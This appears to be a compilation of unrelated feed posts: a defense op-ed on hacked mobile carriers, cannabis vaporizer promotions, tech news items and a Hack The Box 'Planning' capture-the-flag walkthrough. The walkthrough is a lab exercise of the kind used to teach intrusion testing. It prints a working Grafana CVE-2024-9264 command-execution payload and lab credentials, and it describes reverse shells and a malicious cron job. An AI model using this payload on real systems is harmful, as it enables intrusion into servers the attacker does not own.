A freshly belligerent China is flexing its muscles in ways not seen since the USSR during the Cold War, forging a new illiberal alliance with Russia and North Korea. But the latent battlefield is farther reaching and more dangerous in the information age.

As we now know, over “a years long, coordinated assault,” China has stolen personal data from nearly every single American. This data lets them read our text messages, listen to our phone calls, and track our movements anywhere in the United States and around the world — allowing China to build a nearly perfect intelligence picture of the American population, including our armed forces and elected officials.

This state of affairs leaves corporate leaders, democracy advocates and other private citizens vulnerable to blackmail, cyber attacks and other harassment. Even our national leaders are not immune.

Last year, China targeted the phones of President Donald Trump and Vice President JD Vance in the course of the presidential campaign, reminding us that vulnerabilities in the network can affect even those at the highest levels of government. The dangers were drawn into stark relief earlier this year when Secretary of Defense Pete Hegseth used his personal phone to pass sensitive war plans to his colleagues, along with a high-profile journalist. That incident underscored what we’ve seen in Russia’s invasion of Ukraine, Ukraine’s Operation Spiderweb drone attacks on Russia, and on front lines the world over: Modern wars are run on commercial cellular networks, despite their vulnerabilities.

Many Americans would be surprised to learn that there is no impenetrable, classified military cellular network guiding the top-flight soldiers and weapons we trust to keep us safe. The cellular networks that Lindsay Lohan and Billy Bob Thornton sell us during NFL games are the same networks our troops and national security professionals use to do their jobs. These carriers have a long, shockingly consistent history of losing our personal data via breaches and hacks — as well as selling it outright, including to foreign governments. So it’s no wonder that, when the Pentagon asked carriers to share their security audits, every single one of them refused.

This isn’t a new revelation. Twenty years ago, I served as a Special Forces communications sergeant in Iraq. There, U.S. soldiers regularly used commercial BlackBerries — not because the network was secure, but because they knew their calls would connect. It’s surreal that two decades later, our troops are still relying on commercial phones, even though the security posture has not meaningfully improved.

A big part of the reason why this challenge persists stems from an all-too-familiar issue in our government: a wall of red tape that keeps innovative answers from reaching public-sector problems.

In this case, a solution to the Pentagon’s cell network challenge already exists. The Army requested it, and our soldiers need it. But when they tried to acquire this technology, they were immediately thwarted. Not by China or Russia — but by the United States government’s own bureaucracy.

It turns out that the Defense Department is required to purchase cellular service on a blanket, ten-year contract called Spiral 4. The contract was last renewed in early 2024 to AT&T, Verizon, T-Mobile and a few others, about a year before a solution existed. Yet despite this, rigid procurement rules dictate that the Pentagon will have to wait … presumably another eight years until the contract re-opens for competition.

The FCC recently eliminated regulations calling on telecoms to meet minimum cybersecurity standards, noting that the focus should instead be collaboration with the private sector. I agree. But to harness the full ingenuity of our private sector, our government should not be locking out startups. From Palantir to Starlink to Oura, startups have proven that they can deliver critical national security technologies, out-innovating entrenched incumbents and offering people services they need.

The Pentagon has made real, top-level policy changes to encourage innovation. But it must do more to ensure that our soldiers are equipped with the very best of what they need and deserve, and find and root out these pockets of stalled bureaucratic inertia. Because America’s enemies are real enough – our own red tape should not be one of them.

John Doyle is the founder and CEO of Cape. He previously worked at Palantir and as a Staff Sergeant in the Special Forces.

The post China hacked our mobile carriers. So why is the Pentagon still buying from them? first appeared on Federal News Network.

Google Chrome 144 and Firefox 147 patch 26 security flaws, including high-severity bugs and sandbox escapes. Here’s what’s fixed and why updates matter.

The post Google and Mozilla Patch 26 Security Flaws in Chrome 144, Firefox 147 appeared first on TechRepublic.

Google Chrome 144 and Firefox 147 patch 26 security flaws, including high-severity bugs and sandbox escapes. Here’s what’s fixed and why updates matter.

The post Google and Mozilla Patch 26 Security Flaws in Chrome 144, Firefox 147 appeared first on TechRepublic.

We’ve been aware of projects like Cosmopolitan that allow you to crank out a single executable that will run on different operating systems. [Kamila] noticed that the idea was sound, but that the executables were large and there were some limitations. So she produced a 13K file that will run under Windows, Linux, or even in a Web browser. The program itself is a simple snake game.

There seems to be little sharing between the three versions. Instead, each version is compressed and stitched together so that each platform sees what it wants to see. To accommodate Windows, the file has to start with a PE header. However, there is enough flexibility in the header that part of the stub forms a valid shell script that skips over the Windows code when running under Linux.

So, essentially, Windows skips the “garbage” in the header, which is the part that makes Linux skip the “garbage” in the front of the file.

That leaves the browser. Browsers will throw away everything before an <HTML> tag, so that’s the easy part.

Should you do this? Probably not. But if you needed to make this happen, this is a clear template for how to do it. If you want to go back to [Kamila’s] inspiration, we’ve covered Cosmopolitan and its APE format before.

In today’s fast and furious cannabis industry, making a reliably available product that’s consistently of the highest quality is a crucial component to finding success in the industry.

With a multitude of elements like shifting legal economies and breakthroughs in research constantly in play, being bogged down by inefficiencies can be the difference between becoming a household name and gathering dust on the shelf.

That’s why Eaze investor Jeff Wu set out to establish a new gold standard in vape and pre-roll manufacturing in the form of Xylem Robotics.

“We do what we say we can do,” Wu confirms. “We don’t advertise fluff, we don’t make up numbers—we strive to deliver precision with technology.”

Powered by a team of professionals with a deep well of talent and experience doing business with the US Government, as well as large retailers such as Apple and Target, Xylem Robotics is on a mission to bring the technology of tomorrow to today’s cannabis industry.

Meet Xylem

Xylem Robotics is a Houston-based business that’s quickly earned a reputation as a global leader in the development of intelligent, automated cannabis industry solutions, including milestones such as the innovation of proprietary robotic cartridge production systems and optimization for vaporizer cartridge supply chains.

Dedicated to helping businesses eliminate bottlenecks, achieve greater efficiency, and scale effectively, Xylem Robotics is here to help companies deliver a strong, sustained competitive advantage that takes every stage of the manufacturing process into account.

Want to learn more about the people-powered work at the heart of Xylem? Check out this wonderful documentary on Xylem’s work partnering with Chico Cannabis Company founder David Petersen, which covers his background as a military veteran and how it shaped his journey in cannabis manufacturing.

The Xylem Difference

Xylem’s automated solutions have been designed to maintain product quality while embracing industry-leading operating standards.

This means careful oversight that includes quality checks during every step of the manufacturing process, from the Xylem floor to your hands. This, along with their continued commitment to excellent customer service, continues to set Xylem apart.

Furthermore, Xylem systems utilize the latest in advanced technology to dispense material at industry-low temperatures, negating both terpene degradation and material oxidation. In combination with production speeds that would otherwise require a large team and alternative methods, this process provides businesses that purchase Xylem’s systems with a significant and valuable competitive advantage.

Cartridge Filling & Capping

Ready to have your carts capped and filled with reliable ease every time? Check out the Xylem X4: the world’s fastest vape cart filling machine.

The Xylem X4 fully automates cart filling and capping, greatly simplifying the vaporizer manufacturing process. As the fastest cart-filling system on the market, Xylem’s X4 is an unparalleled product in a crowded market. In fact, just one X4 machine can deliver the output equivalent to 20 workers at a fraction of the cost. That’s what makes the Xylem X4 cart-filling machine the best solution on the market for cannabis manufacturers.

Specs? We’ve got those! The Xylem X4 boasts a fill speed of 1650 units per hour. Additionally, it can handle all manner of liquid concentrates and any 510 top-filled vape cart unit with press, screw or click-in closures. Able to fill at temperatures as low as 45° C, their fully automated process also includes in-line fills and immediate capping to preserve terpenes. Click here to request a demo.

Pre-Roll Infusion System

For many companies, the bottom line with infused pre-rolls is how efficiently they can get them filled and out to customers to enjoy. That’s why Xylem developed the Xylem Y2. Fully automated, this pre-roll infusion machine is capable of reliably producing 500-700 units per hour. Whether your brand is focused on paper cones, straight-rolled tubes, blunt wraps, or other form factors, Xylem’s Y2 can handle them all.

The Xylem Y2 is also capable of handling all forms of liquid concentrate fill material. That includes rosin, live resin, distillate, sauce, CBD, D8, and HHC — all of which can be filled at temperatures as low as 35 °C. Available infusion types include donut joints and hash holes, all overseen by one expert technician to reduce needs for surplus staffing while keeping your products at premium quality, thanks in part to the Xylem Y2’s precision pumping and temperature control settings.

You will also enjoy complete control over the location and the shape of the resin deposit with Xylem’s modifiable settings and precision linear slider. This allows the operator to precisely adjust the resin deposit location inside each pre-roll while simultaneously eliminating oil spots. Both straight lines and cone-shaped deposits can be easily achieved with Y2 to prevent canoeing and dripping for multiple styles of pre-rolls. See specs and learn more about how the Xylem Y2 can elevate your brand’s output today.

The post Xylem Robotics’ Automated Innovations Improve Cannabis Tech appeared first on Cannabis Now.

UFC heavyweight contender Curtis “Razor” Blaydes is a major player in the world of mixed martial arts. He’s what you get when you combine the raw strength of an athlete with the strategy of a chess player. Blaydes is recognized across the sport for his formidable wrestling and explosive takedowns. As he navigates the intense physical demands and injury risks inherent in elite MMA, Blaydes is finding that recovery isn’t just about taking a break, it’s also a secret weapon that combats the risk of injury, enhances performance, and increases the potential for overall athletic progress.

Strategic Approaches to Cannabis Recovery

In his quest for the Holy Grail of peak performance and career longevity, Blaydes is pioneering state-of-the-art recovery methods through continuous improvement and a disciplined post-training regimen. Blaydes is not alone. Performance-tuning the recovery process is now an essential component of wellness as athletes balance healing, pain management, and stress reduction. The cornerstone of Blaydes’ recovery program is the AirVape Legacy PRO 2, a bespoke combustion-free experience that transforms the therapeutic benefits of cannabis.

“I’m always looking for ways to recover smarter,” Blaydes says. “The AirVape Legacy PRO 2 is clean, fast, and helps me wind down the right way.”

According to AirVape co-owner Gary Szilagyi, “what sealed the [partnership] was the shared philosophy: we both believe cannabis can be used intentionally for recovery, mental clarity, and focus, not just recreation. It felt like a natural fit: his discipline and story amplified our vision, and our technology elevated his routine.”

The Legacy PRO 2 is AirVape’s next evolution of their original award-winning Legacy PRO dry herb vaporizer. And the love for this device runs deep. As AirVape’s first user-centered upgrade, it reflects direct input from the brand’s dedicated following—a community that’s helped cement its place among the top names in vaporization. As the company website states, they’re “taking everything users loved about the original Legacy Pro and enhancing it with smarter design, refined aesthetics, and user-driven upgrades.”

If you, like Blaydes, are interested in joining the AirVape community and utilizing cannabis as part of your health and wellness routine, then you’ve found the right company. Their entire ethos is centered on promoting wellness through innovation. Founder Roland Szegi, a former athlete, envisioned transforming the portable vaporizer landscape. In the sequel to the original AirVape Legacy, he released a device that captured high performance, elegance, and mindfulness.

Setting a New Gold Standard

The AirVape Legacy PRO 2 is a sleek, ergonomic device that fits naturally in the palm of your hand. Designed for modern wellness seekers, it’s the cornerstone of a discreet ritual—an elegant piece of technology that hides in plain sight while subtly masking the aroma of the herbs within.

Wrapped in hand-applied cork fabric with 24k gold flakes over a gunmetal frame, the vape balances modern design with artisanal detail—no two devices are exactly alike. The gold freckles upon the cork detailing are an homage to AirVape’s dedication to quality materials that produce a session’s luxury experience. Engraved into the leather is its name, bordered with delicate stitching.

While the cork is aesthetically pleasing, it also functions to insulate the device’s heat and to maintain temperature precision. While the top vaporization devices on the market are quick to heat up within 30-40 seconds, the Legacy PRO 2 heats up in just 15 seconds. The hybrid heating methodology, gold-plated filters, detailing, and the glass airpath level up the original Legacy design. By integrating both conduction and convection, the device achieves true hybrid heating—a rare innovation that sets it apart from competitors.

Blaydes had already been using vaporizers as part of his recovery routine, but when he tried the Legacy Pro, he immediately appreciated the design, build quality, and clean vapor experience. The glass is also easy to maintain, with a replaceable battery to enhance the lifespan of the device. The user’s ability to precisely adjust the temperature puts control back into the user’s hands to achieve efficient and even heating of the chamber. You can modify the temperature per strain and terpene profile for the best flavor and extend session time through temperature modulation.

Unparalleled Functionality

AirVape stood out to Blaydes because of his open advocacy for innovative, cleaner recovery methods. That innovation, The Legacy PRO 2, arrives assembled and ready to charge with a universally compatible USB-C port. To turn the device on, click the button three times. The device either times down or shuts down with clicking the button three times. This Legacy PRO 2 provides a visual display that is used to turn the temperature up and down, adjust session length, gauge battery life, and to say goodbye with a “ciao ” and a smile when turned off.

This dual-use vape can hold flower or concentrate, adding convenience to a busy lifestyle. The gold-plated chamber isn’t just for looks— the chamber is interchangeable and easy to replace. It is an innovation on traditional heating devices with gold, a metal that’s traditionally been in medical devices, thanks to its stable characteristics. We’re impressed by how AirVape seamlessly blends form and function to create a device that isn’t just aesthetically pleasing but effective at what it’s designed to do.

The Legacy PRO 2 also comes with two important accessories. First, there’s a loading tool that presses flower from the grinder into a compact puck that’s easy to take in and out of the device, making cleanup easy. Secondly, there’s a glass piece, reminiscent of the top of a water pipe, that helps with cooling the vapor further when playing with higher temperatures and wax. It’s easier to customize and pursue hybrid sessions by incorporating flower and sugar at the same time. The device’s innovations are born from real challenges compiled from AirVape’s dedicated fan base, making this the clean and innovative design Blaydes relies on.

Rethinking The Recovery Paradigm

Together, Blaydes and Air Vape are pushing cannabis and sports with their willingness to educate other athletes about alternatives to traditional painkillers. “What’s really striking is how authentic [Blades’] involvement is,” describes Szilagyi. “He’s not just endorsing a product; he’s sharing his own recovery journey.” Blaydes is championing the paradigm shift in athletic recovery. Acceptance of cannabis in sport is growing as regulations around flower use continue to vary.

Vaporization devices like the AirVape PRO 2 play a vital role in supporting athletic wellness and performance. They offer an opportunity for all of us to channel our inner Blaydes as we strive for peak potential.

The post AirVape’s Legacy PRO 2: This Portable Luxury Vaporizer Is Innovating Cannabis Recovery appeared first on Cannabis Now.

🔥 Elevate Your CBD Experience – Explore the Best Vaporizers, Pods & Grinders at The Vault Headshop! 

If you’re looking to take your CBD and vaping journey to the next level, The Vault Headshop has everything you need. From premium CBD vape kits and high-performance vaporizers, to durable grinders and exclusive discount codes. Let’s explore some of our top picks for this season.

We’re proud to feature premium products from Storz & Bickel, Aztec CBD, and of course, yours truly – The Vault. Whether you’re after top-quality accessories, trusted CBD ranges, or collectible seeds, we aim to bring together the best in the industry for our customers.

⚙️ Venty Vaporiser Complete Set – Precision Meets Power

Key Features:

Rapid 20-second heat-up

Adjustable airflow & temperature

Long-lasting battery life

Premium German engineering

Compact, portable design

For those who value flavour precision, vapour density, and portability, the Venty

Vaporiser delivers an unmatched vaping experience. Designed by the experts at Storz & Bickel, the Venty combines powerful heating technology with a fast heat-up time and precise temperature control for the ultimate session.

With adjustable airflow, USB-C charging, and Bluetooth app connectivity, this vaporiser stands at the cutting edge of innovation. Whether you’re using dry herbs or CBD flower, the Venty ensures consistent, smooth vapour with every draw.

👉 Buy the Venty Vaporiser

🔥 Volcano Hybrid Vaporiser by Storz & Bickel – The Gold Standard

Key Features:

Dual inhalation system (balloon + whip)

Rapid heat-up and precision temperature control

App connectivity via Bluetooth

Storz & Bickel’s premium German build quality

The Volcano Hybrid is the pinnacle of vaporiser technology — a desktop unit known worldwide for its superior vapour quality and engineering excellence. Made by Storz & Bickel, this device offers both balloon and whip inhalation, giving you complete control over your session.

Equipped with digital temperature controls, a clear touch display, and Bluetooth app functionality, the Volcano Hybrid ensures precision and consistency, making it a favourite among seasoned users and medical CBD consumers alike.

👉 Buy the Volcano Hybrid

🌈 Aztec CBD Pod System 2000mg – Premium Quality, Incredible Flavour

The Aztec CBD Pod System 2000mg is the perfect starter kit for anyone looking to enjoy the smooth, flavour-rich benefits of CBD.

Each pod delivers up to 2000 puffs of premium broad-spectrum CBD, carefully blended to provide a relaxing, balanced experience.

Choose from 15 delicious strain-inspired flavours including:

Blue Dream, Blueberry Kush, Buddah Haze, Fruit Punch, GG4, Grape Fruit, Mango Kush, Pineapple Kush, Raspberry Kush, Sherbet OG, Strawberry Ice, Super Lemon Haze, Watermelon Gelato, White Widow, and Zkittlez.

Each flavour captures the authentic terpene profiles of your favourite cannabis strains, providing a natural taste and smooth inhale. Perfect for on-the-go use, the Aztec Pod System is lab-tested, THC-free, and crafted using premium hemp extract for reliable quality.

💨 Key Features:

2000mg CBD per pod

Up to 2000 puffs

Rechargeable pod system

THC-free & lab-certified

Easy to use for beginners and enthusiasts

👉 Shop Aztec CBD Pod Systems

The Vault 63mm Heavy-Duty Metal Grinder – Built to Last

Key Features:

63mm 4-part design with pollen catcher

Heavy-duty aluminium build

Smooth, even grinding action

The Vault custom branding

No vaping or herbal session is complete without a reliable grinder, and The Vault 63mm Heavy-Duty Metal 4-Part Grinder delivers exceptional performance. With its robust design, precision-cut teeth, and fine mesh screen, it ensures a perfect grind every time — preserving flavour and texture.

Branded with the signature The Vault logo, this grinder not only performs flawlessly but looks great in any collection.

👉 Buy The Vault 63mm Large Grinder

OFFERS

You can get yourself 10% OFF any of these products (plus any other products sitewide) with code : HEAD10

Halloweed Special Discounts still running – Limited Time Only!

Take advantage of our exclusive offers this season:

🎃 33% OFF all Phoenix Seeds with code HALLOW33D — available only until Halloween’s witching hour!

Now’s the perfect time to stock up on your favourite CBD and head shop essentials.

🛒 Shop Smart. Vape Better. Relax Naturally.

Newsletter Sign Up

Make sure you never miss another Vault Giveaway or Promo – sign up for our newsletter!

Legal Disclaimer: The competition winners will have their prizes sent to them via recorded delivery. Please, double-check you’re giving us your full address correctly. If you win the competition but don’t receive your prize, we cannot resend competition prizes, so you’ll have to raise this with your local delivery service (In the UK, for example, this would be Royal Mail).

Remember: It is illegal to germinate cannabis seeds in many countries including the UK. It is our duty to inform you of this fact and to urge you to obey all of your local laws to the letter. The Vault only ever sells or sends out seeds for souvenir, collection or novelty purposes.

Hey vapor-enthusiasts and savvy shoppers — we’ve got exciting news for you!

At The Vault Headshop, we’re thrilled to announce the arrival of three fresh new editions of the Pulsar APX V3 dry-herb vapouriser. Whether you’re after style, portability, or top-tier function, we’ve got you covered. And yes — we’ve got a sweet treat for you too: use code “HEAD10” at checkout to get 10% off your purchase plus all other products site wide.

Ready to dive in? Let’s explore each one, get to know the features, and see which edition fits you best.

Pulsar APX V3 – Wood Grain Edition

Style meets substance — this one’s for the person who loves organic vibes but doesn’t compromise on performance.

Key features:

Large ceramic heating chamber (~0.5 g capacity) for longer sessions.

Five preset temperature settings to customise flavour and cloud balance.

Rapid 30-second heat-up time.

Haptic feedback and LED display to keep you informed.

“Cash” mode (high-temp blast) for full extraction of your herbs.

Why you’ll love it:

The Wood Grain finish gives the unit a classy, natural aesthetic — more than your average vapouriser.

Under the hood, you’re still getting all the cutting-edge features of the APX V3 line.

Ideal for the user who wants to stand out a little and carry something premium yet pocket-friendly.

Buy Now

Pulsar APX V3 – Emerald Green Edition

Ready for a pop of colour? The Emerald Green edition brings vibrant style into your vaping game.

Features to love:

1600 mAh battery for strong session life.

Compact and portable (31 mm x 23 mm x 101 mm).

Single-button operation for easy use.

Isolated air path and conduction heating for clean, flavourful vapour.

Why you’ll love it:

The bold green finish sets it apart from the usual black or silver vapourisers, adding personality to your setup.

While the exterior is bright, the internal tech remains rock solid — it’s the same trusted APX V3 performance.

Perfect for users who want something fun and fresh without sacrificing functionality.

Buy Now

Pulsar APX V3 – Jet Black Edition

For those who prefer a sleek, minimalist look with cutting-edge functionality, the Jet Black edition is all business. It’s stealthy, powerful, and now even more convenient with USB-C charging.

Features worth noting:

USB-C charging for faster, easier power-ups.

Classic black finish for a timeless, stealthy aesthetic.

0.5 g ceramic chamber with conduction heating.

Five temperature settings and haptic feedback.

Compact, durable design for everyday use.

Why you’ll love it:

For those who prefer a sleek, minimalist look with cutting-edge functionality, the Jet Black edition is all business. It’s stealthy, powerful.

Buy Now

Why the Pulsar APX V3 Range Belongs in Your Collection

At The Vault, we look for gear that hits three key boxes: performance, style, and affordability — and these Pulsar APX V3 editions check all three.

Real value: one of the most efficient, affordable dry-herb vapourisers on the market.

Choice of styles: wood grain, emerald pop, or stealth black — something for every vibe.

The features that matter: quick heat-up, multiple temperature settings, long battery life, and premium build quality.

These devices perfectly blend functionality and flair, making them a must-have for any head-shop enthusiast.

Don’t Forget: 10% Off with Code HEAD10

Because we’re stoked about this launch, we’re giving you 10% off on all Pulsar APX V3 editions.

Just enter HEAD10 at checkout to claim your savings.

Newsletter Sign Up

Make sure you never miss another Vault Giveaway or Promo – sign up for our newsletter!

Legal Disclaimer: The competition winners will have their prizes sent to them via recorded delivery. Please, double-check you’re giving us your full address correctly. If you win the competition but don’t receive your prize, we cannot resend competition prizes, so you’ll have to raise this with your local delivery service (In the UK, for example, this would be Royal Mail).

Remember: It is illegal to germinate cannabis seeds in many countries including the UK. It is our duty to inform you of this fact and to urge you to obey all of your local laws to the letter. The Vault only ever sells or sends out seeds for souvenir, collection or novelty purposes.

Introduction to Planning:

In this write-up, we will explore the “Planning” machine from Hack The Box, categorised as an easy difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.

Objective:

The goal of this walkthrough is to complete the “Planning” machine from Hack The Box by achieving the following objectives:

User Flag:

During reconnaissance, extensive fuzzing was required to identify a Grafana instance vulnerable to CVE-2024-9264—a critical flaw enabling arbitrary command execution through unsanitized SQL inputs in the DuckDB CLI. By deploying a proof-of-concept exploit, I successfully extracted files and ran commands, gaining entry to the Grafana container but not the underlying host. Subsequent enumeration uncovered valid credentials for the user “enzo,” which granted SSH access to the host system.

Root Flag:

Once on the host, I discovered the Crontab-UI service—a web-based tool for managing cron jobs—running on localhost:8000 and secured with Basic Authentication. Leveraging the earlier credentials for the “enzo” user, I authenticated to the interface and added a malicious cron job configured to establish a reverse shell connection.

Enumerating the Machine

Reconnaissance:

Nmap Scan:

Begin with a network scan to identify open ports and running services on the target machine.

nmap -sC -sV -oA initial 10.10.11.68

nmap -sC -sV -oA initial 10.10.11.68

Nmap Output:

┌─[dark@parrot]─[~/Documents/htb/planning]
└──╼ $nmap -sC -sV -oA initial 10.10.11.68 
# Nmap 7.94SVN scan initiated Wed Sep 10 08:09:24 2025 as: nmap -sC -sV -oA initial 10.10.11.68
Nmap scan report for 10.10.11.68
Host is up (0.048s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 62:ff:f6:d4:57:88:05:ad:f4:d3:de:5b:9b:f8:50:f1 (ECDSA)
|_  256 4c:ce:7d:5c:fb:2d:a0:9e:9f:bd:f5:5c:5e:61:50:8a (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://planning.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep 10 08:09:35 2025 -- 1 IP address (1 host up) scanned in 11.35 seconds
┌─[dark@parrot]─[~/Documents/htb/planning]
└──╼ $

┌─[dark@parrot]─[~/Documents/htb/planning]
└──╼ $nmap -sC -sV -oA initial 10.10.11.68 
# Nmap 7.94SVN scan initiated Wed Sep 10 08:09:24 2025 as: nmap -sC -sV -oA initial 10.10.11.68
Nmap scan report for 10.10.11.68
Host is up (0.048s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 62:ff:f6:d4:57:88:05:ad:f4:d3:de:5b:9b:f8:50:f1 (ECDSA)
|_  256 4c:ce:7d:5c:fb:2d:a0:9e:9f:bd:f5:5c:5e:61:50:8a (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://planning.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep 10 08:09:35 2025 -- 1 IP address (1 host up) scanned in 11.35 seconds
┌─[dark@parrot]─[~/Documents/htb/planning]
└──╼ $

Analysis:

• Port 22 (SSH): Secure Shell service for remote access.
  
• Port 80 (HTTP): Web server running Apache.
  

Web Application Exploration:

The website for Edukate appears to be a standard educational platform.

What is Edukate?

Edukate is a free educational website template designed for online learning platforms and academic institutions. Its intuitive layout improves user engagement, while its clean, developer-friendly codebase makes customization simple. Built with Sass for easy maintenance, Edukate is optimized for page speed to deliver fast loading times and lower bounce rates. It is fully cross-browser compatible, ensuring a smooth experience across all major browsers, and SEO-friendly to help boost search engine rankings.

Source: themewagon/Edukate

No usable elements are present here.

Nothing noteworthy here either.

Web Enumeration:

Perform web enumeration to discover potentially exploitable directories and files.

gobuster vhost -u http://planning.htb -w combined_subdomains.txt --append-domain -t 50

gobuster vhost -u http://planning.htb -w combined_subdomains.txt --append-domain -t 50

Gobuster Output:

┌─[dark@parrot]─[/opt/SecLists/Discovery/DNS]
└──╼ $gobuster vhost -u http://planning.htb -w combined_subdomains.txt --append-domain -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://planning.htb
[+] Method:          GET
[+] Threads:         50
[+] Wordlist:        combined_subdomains.txt
[+] User Agent:      gobuster/3.6
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: grafana.planning.htb Status: 302 [Size: 29] [--> /login]
===============================================================
Finished
===============================================================
┌─[dark@parrot]─[/opt/SecLists/Discovery/DNS]
└──╼ $

┌─[dark@parrot]─[/opt/SecLists/Discovery/DNS]
└──╼ $gobuster vhost -u http://planning.htb -w combined_subdomains.txt --append-domain -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://planning.htb
[+] Method:          GET
[+] Threads:         50
[+] Wordlist:        combined_subdomains.txt
[+] User Agent:      gobuster/3.6
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: grafana.planning.htb Status: 302 [Size: 29] [--> /login]
===============================================================
Finished
===============================================================
┌─[dark@parrot]─[/opt/SecLists/Discovery/DNS]
└──╼ $

Analysis:

Discovery: grafana.planning.htb

• Gobuster found a valid virtual host: grafana.planning.htb.
• This is likely an internal service meant for the organization’s team, not a public endpoint.
• Since it contains grafana, it strongly suggests it is a Grafana dashboard instance.

Grafana Application

The grafana.planning.htb subdomain loads successfully and displays the Grafana login page.

We should be able to log in using the credentials provided by Hack The Box.

• Username: admin
• Password: 0D5oT70Fq13EvB5r

We need to inspect the traffic using Burp Suite.

First, I noticed that the endpoint /api/user/auth-tokens-rotate is available here.

We successfully gained access to the Grafana dashboard.

We also confirmed that the Grafana instance is running version 11.0.0

There are numerous tokens being rotated here.

This is what the response looks like in Burp Suite.

Critical SQL Expression Vulnerability in Grafana Enabling Authenticated LFI/RCE

This vulnerability targets Grafana 11’s experimental SQL Expressions feature, which allows users to post-process query results via custom SQL using DuckDB. The flaw arises because user input isn’t properly sanitized before being sent to the DuckDB CLI, enabling remote code execution (RCE) or arbitrary file reads. The root cause is unfiltered input passed directly to the DuckDB command-line interface. The CVSS v3.1 score is 9.9 (Critical).

Grafana doesn’t include DuckDB by default. For exploitation, DuckDB must be installed on the server and accessible in Grafana’s PATH. If it’s absent, the system is safe.

Using a PoC, we can exploit this flaw to read system files, demonstrating its impact and severity.

Let’s search Google for potential exploits targeting Grafana v11.0.0

This flaw enables authenticated users to attain remote code execution (RCE). I exploited it using the publicly available proof-of-concept from Nollium’s GitHub repository.

We successfully retrieved the /etc/passwd file.

When we ran the whoami command, it returned root, which is unexpected.

Let’s set up our listener.

Unfortunately, we were unable to execute the command due to an error.

As suspected, this is running inside a Docker container.

The environment variables reveal the Grafana admin credentials:

• GF_SECURITY_ADMIN_USER=enzo
• GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!.

Exploit CVE-2024-9264 using Burp Suite.

The api/ds/query endpoint is available in Grafana, and we can leverage it for this exploit.

If the full path is not specified, it responds with a “Not Found” message.

However, attempting to execute the full path results in an “Unauthorized” response.

It’s still the same; we need to send the JSON data here.

After replacing the token, it worked.

{
  "from": "1729313027261",
  "queries": [
    {
      "datasource": {"name": "Expression", "type": "__expr__", "uid": "__expr__"},
      "expression": "SELECT 1; install shellfs from community; LOAD shellfs; SELECT * FROM read_csv(\"whoami > /tmp/output.txt 2>&1 |")",
      "hide": false,
      "refId": "B",
      "type": "sql",
      "window": ""
    }
  ],
  "to": "1729334627261"
}

{
  "from": "1729313027261",
  "queries": [
    {
      "datasource": {"name": "Expression", "type": "__expr__", "uid": "__expr__"},
      "expression": "SELECT 1; install shellfs from community; LOAD shellfs; SELECT * FROM read_csv(\"whoami > /tmp/output.txt 2>&1 |")",
      "hide": false,
      "refId": "B",
      "type": "sql",
      "window": ""
    }
  ],
  "to": "1729334627261"
}

This JSON payload is a crafted query sent to Grafana’s api/ds/query endpoint. It uses the Expression data source with an SQL expression to run a sequence of commands: first installing and loading the shellfs extension, then executing whoami and redirecting the output to /tmp/output.txt. This effectively demonstrates command execution through CVE-2024-9264.

Reading the contents of /tmp/output.txt confirms that the whoami command executed on the target machine.

Let’s set up our listener to catch the reverse shell.

Use this SQL command to execute the bash script.

It’s hanging, which is a good sign that the payload is executing.

We successfully received a reverse shell connection.

We attempted to switch to the enzo user with su enzo, but it didn’t work.

SSH worked perfectly and allowed us to log in successfully.

We were able to read the user flag by running cat user.txt.

Escalate To Root Privileges Access

Privilege Escalation:

Locate the database file.

We discovered /opt/crrontabs/crontab.db.

The password for root_grafana is P4ssw0rdS0pRi0T3c.

Port 8000 is open here, which is unusual.

Let’s set up port forwarding for port 8000.

We need to provide the credentials to log in.

We need to use the credentials we discovered earlier to log in.

It turned out to be a cron jobs management interface.

What is Cronjob-UI?

Crontab-UI is an open-source Node.js web interface for managing cron jobs on Unix-like systems, simplifying tasks like creating, editing, pausing, deleting, and backing up crontab entries via a browser (default: http://localhost:8000). It reduces errors from manual text editing, supports error logging, email notifications, webhooks, and easy import/export for multi-machine deployment. Installation is via npm (npm install crontab-ui -g), with optional Docker support and Basic Auth for security. Ideal for beginners handling scheduled tasks.

We need to create a new cron job command.

The shell.sh file contains the reverse shell that will connect back to us.

We will use curl to fetch the file, as demonstrated earlier.

The file was transferred successfully, as expected.

We were able to access the root shell and read the root flag by running cat root.txt.

The post Hack The Box: Planning Machine Walkthrouh – Easy Diffucilty appeared first on Threatninja.net.

Continuous Vulnerability Management: The New Cybersecurity Imperative Security leaders are drowning in data but starving for actionable insights. Traditional penetration testing has become a snapshot of vulnerability that expires faster...

The post Innovator Spotlight: Xcape appeared first on Cyber Defense Magazine.

The AI Threat Landscape: How Adaptive Security is Redefining Cyber Defense Cybersecurity professionals are facing an unprecedented challenge. The rise of generative AI has transformed attack vectors from theoretical risks...

The post Innovator Spotlight: Adaptive Security appeared first on Cyber Defense Magazine.

